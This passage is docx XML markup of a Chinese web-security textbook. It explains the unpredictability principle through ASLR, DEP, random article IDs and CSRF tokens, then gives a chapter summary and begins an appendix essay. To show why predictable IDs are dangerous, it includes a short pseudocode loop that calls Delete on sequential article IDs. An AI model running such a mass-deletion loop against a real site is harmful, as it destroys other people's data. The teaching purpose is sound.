          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Secure By Default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>，是时刻要牢记的总则；纵深防御，是要更全面、更正确地看待问题；数据与代码分离，是从漏洞成因上看问题；接下来要讲的“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>不可预测性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>” 原则，则是从克服攻击方法的角度看问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="328" w:lineRule="auto" w:before="154"/>
        <w:ind w:left="202" w:right="187" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>微软的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>系统用户多年来深受缓冲区溢出之苦，因此微软在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的新版本中增加了许多对抗缓冲区溢出等内存攻击的功能。微软无法要求运行在系统中的软件没有漏洞， </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>因此它采取的做法是让漏洞的攻击方法失效。比如，使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>DEP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t>来保证堆栈不可执行，使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ASLR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>让进程的栈基址随机变化，从而使攻击程序无法准确地猜测到内存地址，大大提高了攻击的门</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>槛。经过实践检验，证明微软的这个思路确实是有效的——即使无法修复 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>，但是如果能够使得攻击的方法无效，那么也可以算是成功的防御。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="326" w:lineRule="auto" w:before="149"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>微软使用的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ASLR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>技术，在较新版本的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>内核中也支持。在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ASLR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>的控制下，一个程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>序每次启动时，其进程的栈基址都不相同，具有一定的随机性，对于攻击者来说，这就是“不</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="326" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="72"/>
        <w:ind w:left="203"/>
      </w:pPr>
      <w:bookmarkStart w:name="1.8  小结" w:id="47"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>可预测性”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="500" w:lineRule="atLeast" w:before="6"/>
        <w:ind w:left="604" w:right="154"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>不可预测性（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>re</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-99"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>，能有效地对抗基于篡改、伪造的攻击。我们看看如下场景：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t>假设一个内容管理系统中的文章序号，是按照数字升序排列的，比如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>id=1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>id=1002,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="101"/>
        <w:ind w:left="203"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>id=1003</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>……</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="326" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="176" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:38.204010pt;width:411.15pt;height:30pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:3040;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="8"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>for (i=0;i&lt;100000;i++){</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="20"/>
                    <w:ind w:left="168" w:right="5998" w:firstLine="0"/>
                    <w:jc w:val="center"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>Delete(url+"?id="+i);</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:w w:val="100"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>这样的顺序，使得攻击者能够很方便地遍历出系统中的所有文章编号：找到一个整数，依次递增即可。如果攻击者想要批量删除这些文章，写个简单的脚本：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="328" w:lineRule="auto" w:before="78"/>
        <w:ind w:left="203" w:right="223"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>就可以很方便地达到目的。但是如果该内容管理系统使用了“不可预测性”原则，将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>id </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的值变得不可预测，会产生什么结果呢？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="155"/>
        <w:ind w:left="603"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>id=asldfjaefsadlf, id=adsfalkennffxc, id=poerjfweknfd</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>……</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="603"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>id </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的值变得完全不可预测了，攻击者再想批量删除文章，只能通过爬虫把所有的页面 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="94"/>
        <w:ind w:left="203"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>全部抓取下来，再一一进行分析，从而提高了攻击的门槛。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="328" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>不可预测性原则，可以巧妙地用在一些敏感数据上。比如在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>的防御技术中，通常会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>使用一个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>来进行有效防御。这个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>能成功防御 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>，就是因为攻击者在实施 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>攻击的过程中，是无法提前预知这个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>值的，因此要求 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>token </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>足够复杂时，不能被攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-26"/>
        </w:rPr>
        <w:t>猜测到。</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>具体细节请参考“跨站点请求伪造”一章。</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="328" w:lineRule="auto" w:before="151"/>
        <w:ind w:left="203" w:right="187" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>不可预测性的实现往往需要用到加密算法、随机数算法、哈希算法，好好使用这条原则， 在设计安全方案时往往会事半功倍。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:tabs>
          <w:tab w:pos="903" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="203" w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250000" w:id="48"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>1.8</w:t>
        <w:tab/>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="290"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>本章归纳了笔者对于安全世界的认识和思考，从互联网安全的发展史说起，揭示了安全问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>题的本质，以及应该如何展开安全工作，最后总结了设计安全方案的几种思路和原则。在后续</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>的章节中，将继续揭示 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>安全的方方面面，并深入理解攻击原理和正确的解决之道——我们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>会面对各种各样的攻击，解决方案为什么要这样设计，为什么这最合适？这一切的出发点，都可以在本章中找到本质的原因。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="223" w:firstLine="403"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>安全是一门朴素的学问，也是一种平衡的艺术。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>无论是传统安全，还是互联网安全，其内</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>在的原理都是一样的。我们只需抓住安全问题的本质，之后无论遇到任何安全问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>（不仅仅局</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>限于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-50"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-16"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>安全或互联网安全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-101"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>，都会无往而不利，因为我们已经真正地懂得了如何用安全的眼</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>光来看待这个世界！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="117"/>
        <w:ind w:left="2444" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="（附）谁来为漏洞买单？18T1F1" w:id="49"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>（附）谁来为漏洞买单？</w:t>
      </w:r>
      <w:hyperlink w:history="true" w:anchor="_bookmark2">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
            <w:w w:val="120"/>
            <w:position w:val="5"/>
            <w:sz w:val="14"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="535" w:lineRule="auto" w:before="296"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>昨天介绍了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>is_a()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数功能改变引发的问题 </w:t>
      </w:r>
      <w:hyperlink w:history="true" w:anchor="_bookmark3">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:color w:val="303030"/>
            <w:position w:val="8"/>
            <w:sz w:val="12"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，后来发现很多朋友不认同这是一个漏洞，原因是通过良好的代码习惯能够避免该问题，比如写一个安全的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>autoload()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="535" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="203" w:right="168" w:firstLine="400"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我觉得我有必要讲讲一些安全方面的哲学问题，但这些想法只代表我个人的观点，是我的安全世界观。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="603"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
